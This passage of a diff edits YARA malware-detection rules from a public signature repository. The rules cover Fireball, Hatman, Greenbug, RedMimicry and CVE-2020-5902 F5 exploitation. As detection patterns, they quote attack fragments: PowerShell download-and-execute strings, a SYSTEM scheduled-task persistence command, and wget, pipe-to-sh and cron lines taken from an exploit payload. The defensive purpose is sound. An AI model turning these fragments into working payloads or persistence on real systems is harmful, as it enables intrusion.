-		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( pe.imphash ( ) == "e4290fa6afc89d56616f34ebbd0b1f2c" or pe.imphash ( ) == "8abecba2211e61763c4c9ffcaa13369e" or pe.imphash ( ) == "a64e048b98d051ae6e6b6334f77c95d3" or pe.imphash ( ) == "359d89624a26d1e756c3e9d6782d6eb0" or pe.imphash ( ) == "c2a87fabf96470db507b2e6b43bd92eb" or pe.imphash ( ) == "62ec3dce1eba1b68f6a4511bb09f8c2c" or pe.imphash ( ) == "5662cfcdfd9da29cb429e7528d5af81e" or pe.imphash ( ) == "406c785a6e2c6970c1e8ed62877e197b" or pe.imphash ( ) == "dbf687d6aa2a6cafe4349f7b0821a792" or pe.imphash ( ) == "6dca3e9fb3928bbdb54dbce669943ec8" or pe.imphash ( ) == "f1a539a5b71ad53ac586f053145f08ec" or pe.imphash ( ) == "3a2003ea545fe942681da9e7683ebb58" or pe.imphash ( ) == "a8286b574ff850cd002ea6282d15aa40" or pe.imphash ( ) == "3c8577ca4bab2f95cc6fc73ef1895288" or pe.imphash ( ) == "84706849fa809feaa385711a628be029" or pe.imphash ( ) == "ba23a556ac1d6444f7f76feafd6c8867" or pe.imphash ( ) == "95e6f8741083e0c7d9a63d45e2472360" or pe.imphash ( ) == "774d797db707398fd2ef1979d02634d5" or pe.imphash ( ) == "8c16c795b57934183422be5f6df7d891" or pe.imphash ( ) == "98f67c550a7da65513e63ffd998f6b2e" or pe.imphash ( ) == "e836076a09dba03e4d6faa46dda0fefc" or pe.imphash ( ) == "ff63dc9c65eb25911a9bc535c8f06ad0" or pe.imphash ( ) == "08b67a9663d3a8c9505f3b2561bbdd1c" or pe.imphash ( ) == "135e92fc9902f3140f2e5a51458efdf0" or pe.imphash ( ) == "4753904c40d638a1bc745c65b88291d5" or pe.imphash ( ) == "0f44bf2b3b0b8d5ecae5689ff1d0e90d" or pe.imphash ( ) == "c4c9ecfc26ca516a80b8f6f5b2bdb7e6" or pe.imphash ( ) == "46ad3d954e527f769e37017b3e128039" or pe.imphash ( ) == "802dcac7aab948c19738ba3df9f356d9" or pe.imphash ( ) == "b36a21279375c40e6f4c1ea347f906de" or pe.imphash ( ) == "77a185e903c5527243ef219b003bfd38" or pe.imphash ( ) == "12a30b523ac71a3cbe9145c89400dd7f" or pe.imphash ( ) == "cc40fefa3af5cd00cc28dbd874038a4d" or pe.imphash ( ) == "3d8c26f4cb1782a87c3bb42796fb6b85" or pe.imphash ( ) == "2f4ddcfebbcad3bacadc879747151f6f" or pe.imphash ( ) == "76812f441b0ed9d3cc0748af25d689a3" or pe.imphash ( ) == "9a06f0024c1694774ae97311608bab5b" or pe.imphash ( ) == "481f47bbb2c9c21e108d65f52b04c448" or pe.imphash ( ) == "286870a926664a5129b8b68ed0d4a8eb" or pe.imphash ( ) == "a0db151d55761167d93eba72d3d94b32" or pe.imphash ( ) == "663243fe4d94e1304b265ce4011cd01b" or pe.imphash ( ) == "f24e64014af9015dc25262e5076fe61f" or pe.imphash ( ) == "b7d08302c927428e16a2ad8d18b9d2b7" or pe.imphash ( ) == "352063077f27a851dc2b08e15f08105e" or pe.imphash ( ) == "b0b97d1a91a2730b3daa8bbb2e86b402" or pe.imphash ( ) == "bc96f1c981700752dc2cf9553da99eb6" or pe.imphash ( ) == "f68ddef5f29b66bbd543e947c8743bb0" or pe.imphash ( ) == "6dfbc160505aa2f7205766eaa6fe72a1" or pe.imphash ( ) == "a202429ffe8d8c8b722572cffd5681a7" or pe.imphash ( ) == "342a3708d93b6b819b7b1a768201a747" or pe.imphash ( ) == "cdc00badc7162acde9bb032e793ac137" or pe.imphash ( ) == "be19e18d6a8b41631d40059031a928bb" or pe.imphash ( ) == "0c54f96a844b02689687407de9b6663e" or pe.imphash ( ) == "fa5f28e70130a452b7c0a51db5544ef9" or pe.imphash ( ) == "2e5708ae5fed0403e8117c645fb23e5b" or pe.imphash ( ) == "8d92fa1956a6a631c642190121740197" or pe.imphash ( ) == "dc73a9bd8de0fd640549c85ac4089b87" )
-}
-
-rule SIGNATURE_BASE_SUSP_Imphash_Mar23_3 : FILE
-{
-	meta:
-		description = "Detects imphash often found in malware samples (Maximum 0,25% hits with search for 'imphash:x p:0' on Virustotal) = 99,75% hits"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "eb91e700-6478-5085-a393-a7b342c0eb4f"
-		date = "2023-03-23"
-		modified = "2023-07-24"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_imphash_detection.yar#L297-L329"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b5296cf0eb22fba6e2f68d0c9de9ef7845f330f7c611a0d60007aa87e270c62a"
-		hash = "5a5a5f71c2270cea036cd408cde99f4ebf5e04a751c558650f5cb23279babe6d"
-		hash = "481b0d9759bfd209251eccb1848048ebbe7bd2c87c5914a894a5bffc0d1d67ff"
-		hash = "716ba6ea691d6a391daedf09ae1262f1dc1591df85292bff52ad76611666092d"
-		hash = "800d160736335aafab10503f7263f9af37a15db3e88e41082d50f68d0ad2dabd"
-		hash = "416155124784b3c374137befec9330cd56908e0e32c70312afa16f8220627a52"
-		hash = "21899e226502fe63b066c51d76869c4ec5dbd03570551cea657d1dd5c97e7070"
-		hash = "0461830e811d3831818dac5a67d4df736b4dc2e8fb185da439f9338bdb9f69c3"
-		hash = "773edc71d52361454156dfd802ebaba2bb97421ce9024a7798dcdee3da747112"
-		hash = "fe53b9d820adf3bcddf42976b8af1411e87d9dfd9aa479f12b2db50a5600f348"
-		logic_hash = "f11de8b7f78cdfc79116670409c31745e2803ef8b8e97d08be012f1146b3d816"
-		score = 45
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( pe.imphash ( ) == "afcdf79be1557326c854b6e20cb900a7" or pe.imphash ( ) == "6ed4f5f04d62b18d96b26d6db7c18840" or pe.imphash ( ) == "fc6683d30d9f25244a50fd5357825e79" or pe.imphash ( ) == "2c5f2513605e48f2d8ea5440a870cb9e" or pe.imphash ( ) == "0b5552dccd9d0a834cea55c0c8fc05be" ) and pe.number_of_signatures == 0
-}
-rule SIGNATURE_BASE_Invoke_Psimage : FILE
-{
-	meta:
-		description = "Detects a command to execute PowerShell from String"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6abf53cd-6465-555b-a7d4-f5a917073f01"
-		date = "2017-12-16"
-		modified = "2023-12-05"
-		reference = "https://github.com/peewpw/Invoke-PSImage"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_invoke_psimage.yar#L2-L27"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ce4bc73fcba3b82e4d11203aa2c3f0b2f85c6eb9e1784ad76a7b20500b4053f8"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$ = "IEX([System.Text.Encoding]::ASCII.GetString(" ascii wide
-		$ = "System.Drawing.Bitmap((a Net.WebClient).OpenRead(" ascii wide
-		$ = { 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52
-            00 00 04 E4 00 00 03 A0 08 06 00 00 00 9D AF A9
-            E8 00 00 00 09 70 48 59 73 00 00 19 D6 00 00 19
-            D6 01 18 D1 CA ED 00 00 00 07 74 49 4D 45 07 E1
-            0C 0F 13 1E 36 89 C4 28 BF 00 00 00 07 74 45 58
-            74 41 75 74 68 6F 72 00 A9 AE CC 48 00 00 00 0C
-            74 45 58 74 44 65 73 63 72 69 70 74 69 6F 6E 00
-            13 09 21 23 00 00 00 0A 74 45 58 74 43 6F 70 79
-            72 69 67 68 74 00 AC 0F CC 3A 00 00 00 0E 74 45
-            58 74 43 72 65 61 74 69 6F 6E 20 74 69 6D 65 00
-            35 F7 0F }
-
-	condition:
-		filesize < 3000KB and 1 of them
-}
-rule SIGNATURE_BASE_Gen_Excel_Auto_Open_Evasion : FILE
-{
-	meta:
-		description = "Detects an obfuscated Auto_Open cell names in Excel files"
-		author = "@JohnLaTwC"
-		id = "e33b8d1d-4978-5747-8b5b-730e6c57dbf0"
-		date = "2020-09-24"
-		modified = "2023-12-05"
-		reference = "https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_excel_auto_open_evasion.yar#L1-L26"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e23f9f55e10f3f31a2e76a12b174b6741a2fa1f51cf23dbd69cf169d92c56ed5"
-		logic_hash = "d7d81683b9abd7b89d6d6ee4d14ff37359acd353a6bd1d88bc793525c8f203d9"
-		score = 70
-		quality = 83
-		tags = "FILE"
-		hash1 = "bb3c9739de8ffe2e0f375847d41a010463ec19f1d3f578ac053651a51ed69bbc"
-		hash2 = "56ff65b7f6bf5936883f52b50ca66e768b2088158cc77af681ffab7122be7753"
-		hash3 = "97243214ac3cad74d60b0648e39d6a9600860edba51c670b5226e058ba658957"
-		hash4 = "9ebf085c05ae94c1b6c4e011001a6c11de3ca754a56ed380314ef501b777e593"
-		hash5 = "b5a8bbf3c7d49bd208d8302f6867b5f6d3d7c09830b575967801893498cc92d9"
-
-	strings:
-		$auto_open = { 00 00 00 00 01 [0-2] (61 | 41) [0-5](75 | 55) [0-5](74 | 54) [0-5](6f | 4f) [0-5](5f | 5f) [0-5](6f | 4f) [0-5](70 | 50) [0-5](65 | 45) [0-5](6e | 4e)}
-		$plain_auto_open = "auto_open" nocase wide ascii
-
-	condition:
-		filesize < 1MB and uint32be( 0 ) == 0xD0CF11E0 and $auto_open and #plain_auto_open == 0
-}
-rule SIGNATURE_BASE_HKTL_NFS_Fuse_NFS
-{
-	meta:
-		description = "Detects the nfs-security-tooling fuse_nfs by HvS Consulting"
-		author = "Moritz Oettle"
-		id = "287fbe7d-ee1c-58a4-aa2d-9d9bec8321b4"
-		date = "2024-10-22"
-		modified = "2025-03-20"
-		reference = "https://github.com/hvs-consulting/nfs-security-tooling"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/hktl_HvS_nfs_security_tooling.yar#L1-L24"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0bd3714b865d77660404e5f3ed1e9c7b55aadc6f58d16761111be57597784686"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$s1 = "NFS3ConnectionFactory" fullword ascii
-		$s2 = "fuse_to_nfs_timestamp" fullword ascii
-		$s3 = "--manual-fh" fullword ascii
-		$s4 = "--fake-uid-allow-root" fullword ascii
-		$s5 = "nfs.rpc.credential" fullword ascii
-		$s6 = "nfs.readlink" fullword ascii
-		$s7 = "pyfuse3.EntryAttributes" fullword ascii
-		$s8 = "Make nested exports on NetApp servers work" fullword ascii
-		$s9 = "add_mutually_exclusive_group" fullword ascii
-
-	condition:
-		4 of them
-}
-rule SIGNATURE_BASE_HKTL_NFS_NFS_Analyze
-{
-	meta:
-		description = "Detects the nfs-security-tooling nfy_analyze by HvS Consulting"
-		author = "Marc Stroebel"
-		id = "3350d0ae-e638-5c8f-a578-ba0ac5521053"
-		date = "2024-10-22"
-		modified = "2025-03-20"
-		reference = "https://github.com/hvs-consulting/nfs-security-tooling"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/hktl_HvS_nfs_security_tooling.yar#L26-L53"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "83a9e5b5b404bf28b0334611fe4f38227212783cecea3c9996d23cb00cad42ed"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$s1 = "no_root_squash_exports" fullword ascii
-		$s2 = "nfs lock manager" fullword ascii
-		$s3 = "netapp partner" fullword ascii
-		$s4 = "xdrdef.mnt3_type" fullword ascii
-		$s5 = "BTRFS subvolumes" fullword ascii
-		$s6 = "Unsupported fsid" fullword ascii
-		$s7 = "nfs3_read_etc_shadow" fullword ascii
-		$s8 = "nfs3_check_no_root_squash" fullword ascii
-		$s9 = "krb5i" fullword ascii
-		$s10 = "nfs4_overview" fullword ascii
-		$s11 = "--btrfs-subvolumes" fullword ascii
-		$s12 = "when escaping a BTRFS export" fullword ascii
-		$s13 = "No NFS server detected" fullword ascii
-
-	condition:
-		6 of them
-}
-rule SIGNATURE_BASE_Fireball_De_Svr : FILE
-{
-	meta:
-		description = "Detects Fireball malware - file de_svr.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "29395239-66d8-5340-b884-9b8f036cc27f"
-		date = "2017-06-02"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/4pTkGQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_fireball.yar#L12-L29"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9ac858b3ce50daac811ded4664f2a602a32d8811825733d235125fc81a488e58"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f964a4b95d5c518fd56f06044af39a146d84b801d9472e022de4c929a5b8fdcc"
-
-	strings:
-		$s1 = "cmd.exe /c MD " fullword ascii
-		$s2 = "rundll32.exe \"%s\",%s" fullword wide
-		$s3 = "http://d12zpbetgs1pco.cloudfront.net/Weatherapi/shell" fullword wide
-		$s4 = "C:\\v3\\exe\\de_svr_inst.pdb" fullword ascii
-		$s5 = "Internet Connect Failed!" fullword ascii
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and 4 of them )
-}
-rule SIGNATURE_BASE_Fireball_Lancer : FILE
-{
-	meta:
-		description = "Detects Fireball malware - file lancer.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2209bcb4-74a6-5c39-962c-ccd4ce62619e"
-		date = "2017-06-02"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/4pTkGQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_fireball.yar#L31-L51"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "74df144556121609da0820c319a86a9de0f49eeb2d4b1ed59c3a4d0c1d7788cb"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7d68386554e514f38f98f24e8056c11c0a227602ed179d54ed08f2251dc9ea93"
-
-	strings:
-		$x1 = "\\instlsp\\Release\\Lancer.pdb" ascii
-		$x2 = "lanceruse.dat" fullword wide
-		$s1 = "Lancer.dll" fullword ascii
-		$s2 = "RunDll32.exe \"" fullword wide
-		$s3 = "Micr.dll" fullword wide
-		$s4 = "AG64.dll" fullword wide
-		$s5 = "\",Start" fullword wide
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( 6 of them )
-}
-rule SIGNATURE_BASE_Qqbrowser : FILE
-{
-	meta:
-		description = "Not malware but suspicious browser - file QQBrowser.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "457507c5-0411-5d72-891b-ae3e428ea2d6"
-		date = "2017-06-02"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/4pTkGQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_fireball.yar#L53-L70"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "525d134f57aaa314bcf0676678264e518edb785970478cb31a8fb6f1c8c92263"
-		score = 50
-		quality = 83
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "adcf6b8aa633286cd3a2ce7c79befab207802dec0e705ed3c74c043dabfc604c"
+		tags = "HATMAN"
 
 	strings:
-		$s1 = "TerminateProcessWithoutDump" fullword ascii
-		$s2 = ".Downloader.dll" fullword wide
-		$s3 = "Software\\Chromium\\BrowserCrashDumpAttempts" fullword wide
-		$s4 = "QQBrowser_Broker.exe" fullword wide
+		$nullsub = { ff ff 60 38  02 00 00 44  20 00 80 4e }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		$nullsub
 }
-rule SIGNATURE_BASE_Chrome_Elf : FILE
+private rule SIGNATURE_BASE_Hatman_Dividers_PRIVATE : HATMAN
 {
 	meta:
-		description = "Detects Fireball malware - file chrome_elf.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8680d5b5-e26f-5a3f-aeab-b965afe91027"
-		date = "2017-06-02"
+		description = "No description has been set in the source file - Signature Base"
+		author = "Florian Roth"
+		id = "1612a184-e06c-5c1b-987d-04e330e17ed0"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/4pTkGQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_fireball.yar#L72-L90"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hatman.yar#L38-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "89f0ab16f164222ecf2a4b14bee02d0c24517d03d1c12b25f5158eebc31b3e3d"
+		logic_hash = "92ec47ea81b78ec9b05f5c17164daaef7112c8590b4443f70cf3bf2efd108e1f"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e4d4f6fbfbbbf3904ca45d296dc565138a17484c54aebbb00ba9d57f80dfe7e5"
+		tags = "HATMAN"
 
 	strings:
-		$x2 = "schtasks /Create /SC HOURLY /MO %d /ST 00:%02d:00 /TN \"%s\" /TR \"%s\" /RU \"SYSTEM\"" fullword wide
-		$s6 = "aHR0cDovL2R2Mm0xdXVtbnNndHUuY2xvdWRmcm9udC5uZXQvdjQvZ3RnLyVzP2FjdGlvbj12aXNpdC5jaGVsZi5pbnN0YWxs" fullword ascii
-		$s7 = "QueryInterface call failed for IExecAction: %x" fullword ascii
-		$s10 = "%s %s,Rundll32_Do %s" fullword wide
-		$s13 = "Failed to create an instance of ITaskService: %x" fullword ascii
-		$s16 = "Rundll32_Do" fullword ascii
+		$div1 = { 9a 78 56 00 }
+		$div2 = { 34 12 00 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 4 of them )
+		$div1 and $div2
 }
-rule SIGNATURE_BASE_Fireball_Regkey : FILE
+private rule SIGNATURE_BASE_Hatman_Setstatus_PRIVATE : HATMAN
 {
 	meta:
-		description = "Detects Fireball malware - file regkey.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6e22bb93-8c8b-510f-a9e4-6e57c392c2ae"
-		date = "2017-06-02"
-		modified = "2022-12-21"
-		reference = "https://goo.gl/4pTkGQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_fireball.yar#L92-L108"
+		description = "No description has been set in the source file - Signature Base"
+		author = "Florian Roth"
+		id = "a0619dad-7cee-585a-9246-b3d4554e512f"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hatman.yar#L21-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f8fe8b1edb009ac84acf6159feada91d364507c53a9f92abd6b245b38fa058f5"
+		logic_hash = "264292bbc479413bf70f05b96bcea3c856906eb8c711720831bea9b887a7ffb0"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fff2818caa9040486a634896f329b8aebaec9121bdf9982841f0646763a1686b"
+		tags = "HATMAN"
 
 	strings:
-		$s1 = "\\WinMain\\Release\\WinMain.pdb" ascii
-		$s2 = "ScreenShot" fullword wide
-		$s3 = "WINMAIN" fullword wide
+		$preset = { 80 00 40 3c  00 00 62 80  40 00 80 3c  40 20 03 7c
+                        ?? ?? 82 40  04 00 62 80  60 00 80 3c  40 20 03 7c
+                        ?? ?? 82 40  ?? ?? 42 38                           }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		$preset
 }
-rule SIGNATURE_BASE_Fireball_Winsap : FILE
+rule SIGNATURE_BASE_MAL_Payload_F5_BIG_IP_Exploitations_Jul20_1 : CVE_2020_5902 FILE
 {
 	meta:
-		description = "Detects Fireball malware - file winsap.dll"
+		description = "Detects code found in report on exploits against CVE-2020-5902 F5 BIG-IP vulnerability by NCC group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e68e7738-f325-5b73-9e61-4e2413b7b7be"
-		date = "2017-06-02"
+		id = "57705ba1-c0ad-5ca6-8539-44d9da6b5942"
+		date = "2020-06-07"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/4pTkGQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_fireball.yar#L110-L128"
+		reference = "https://research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_f5_bigip_expl_payloads.yar#L2-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "de722d90d82f82faa5dfe5991c846e5c16deb919ae653b8f9fe4d1ad0384c41d"
+		logic_hash = "a3651081bb09452d80cba9f673a7b61c8ee2f47a12fb64d975eb63867688ee3b"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c7244d139ef9ea431a5b9cc6a2176a6a9908710892c74e215431b99cd5228359"
+		tags = "CVE-2020-5902, FILE"
 
 	strings:
-		$s1 = "aHR0cDovL2" ascii
-		$s2 = "%s\\svchost.exe -k %s" fullword wide
-		$s3 = "\\SETUP.dll" wide
-		$s4 = "WinSAP.dll" fullword ascii
-		$s5 = "Error %u in WinHttpQueryDataAvailable." fullword ascii
-		$s6 = "UPDATE OVERWRITE" fullword wide
+		$x1 = "rm -f /etc/ld.so.preload" ascii fullword
+		$x2 = "echo \"* * * * * $LDR" ascii
+		$x3 = ".sh -o /tmp/in.sh" ascii
+		$x4 = "chmod a+x /etc/.modules/.tmp" ascii
+		$x5 = "chmod +x /var/log/F5-logcheck"
+		$s1 = "ulimit -n 65535" ascii fullword
+		$s2 = "-s /usr/bin/wget " ascii
+		$s3 = ".sh | sh" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 4 of them )
+		filesize < 300KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Fireball_Archer : FILE
+rule SIGNATURE_BASE_HKTL_Redmimicry_Agent
 {
 	meta:
-		description = "Detects Fireball malware - file archer.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "16bb95c1-af69-5688-8999-f097d02d2ffc"
-		date = "2017-06-02"
-		modified = "2022-12-21"
-		reference = "https://goo.gl/4pTkGQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_fireball.yar#L130-L149"
+		description = "matches the RedMimicry agent executable and payload"
+		author = "mirar@chaosmail.org"
+		id = "a4d4ec77-4a0d-5afd-9181-85433e8b5fda"
+		date = "2020-06-22"
+		modified = "2023-01-06"
+		reference = "https://redmimicry.com"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_redmimicry.yar#L2-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f566ba477ccf1325914b6c9785e2b85f732b211e9321eea24d6c5a0339ccc4d1"
+		logic_hash = "645da2764ca911c4aae80b90622d2c61933dee929403858fc49f7bc0d44300c6"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022"
+		tags = ""
+		sharing = "tlp:white"
 
 	strings:
-		$x1 = "\\archer_lyl\\Release\\Archer_Input.pdb" ascii
-		$s1 = "Archer_Input.dll" fullword ascii
-		$s2 = "InstallArcherSvc" fullword ascii
-		$s3 = "%s_%08X" fullword wide
-		$s4 = "d\\\\.\\PhysicalDrive%d" fullword wide
+		$reg0 = "HKEY_CURRENT_USER\\" ascii
+		$reg1 = "HKEY_LOCAL_MACHINE\\" ascii
+		$reg2 = "HKEY_CURRENT_CONFIG\\" ascii
+		$reg3 = "HKEY_CLASSES_ROOT\\" ascii
+		$cmd0 = "C:\\Windows\\System32\\cmd.exe" ascii fullword
+		$lua0 = "client_recv" ascii fullword
+		$lua1 = "client_send" ascii fullword
+		$lua2 = "$LuaVersion: " ascii
+		$sym0 = "VirtualAllocEx" wide fullword
+		$sym1 = "kernel32.dll" wide fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( $x1 or 3 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Clearlog : FILE
+rule SIGNATURE_BASE_HKTL_Redmimicry_Winntiloader
 {
 	meta:
-		description = "Detects Fireball malware - file clearlog.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3eb58a7a-b04d-52c2-8c3c-c149da8d4aa8"
-		date = "2017-06-02"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/4pTkGQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_fireball.yar#L151-L171"
+		description = "matches the Winnti 'Cooper' loader version used for the RedMimicry breach emulation"
+		author = "mirar@chaosmail.org"
+		id = "a8be1377-faa0-560d-a12c-0369b1f91180"
+		date = "2020-06-22"
+		modified = "2023-01-10"
+		reference = "https://redmimicry.com"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_redmimicry.yar#L28-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6b6fd74ad184cafa7885385f808034e9211ff37e04ed5e8ea4af2c7fb7d697bd"
+		logic_hash = "d8ef457ac41a7c45cc7e97330bdd3de12eb3391c03d0a6a87ddc669c841c325d"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3"
+		tags = ""
+		sharing = "tlp:white"
 
 	strings:
-		$x1 = "\\ClearLog\\Release\\logC.pdb" ascii
-		$s1 = "C:\\Windows\\System32\\cmd.exe /c \"\"" fullword wide
-		$s2 = "logC.dll" fullword ascii
-		$s3 = "hhhhh.exe" fullword wide
-		$s4 = "ttttt.exe" fullword wide
-		$s5 = "Logger Name:" fullword ascii
-		$s6 = "cle.log.1" fullword wide
+		$s0 = "Cooper" ascii fullword
+		$s1 = "stone64.dll" ascii fullword
+		$decoding_loop = { 49 63 D0 43 8D 0C 01 41 FF C0 42 32 0C 1A 0F B6 C1 C0 E9 04 C0 E0 04 02 C1 42 88 04 1A 44 3B 03 72 DE }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and $x1 or 2 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Fireball_Gubed : FILE
+rule SIGNATURE_BASE_Greenbug_Malware_1 : FILE
 {
 	meta:
-		description = "Detects Fireball malware - file gubed.exe"
+		description = "Detects Malware from Greenbug Incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cba2913f-4d9a-5925-ad9a-f5815a635291"
-		date = "2017-06-02"
-		modified = "2022-12-21"
-		reference = "https://goo.gl/4pTkGQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_fireball.yar#L173-L191"
+		id = "3375a392-4896-572c-9688-00f01ea86ca7"
+		date = "2017-01-25"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/urp4CD"
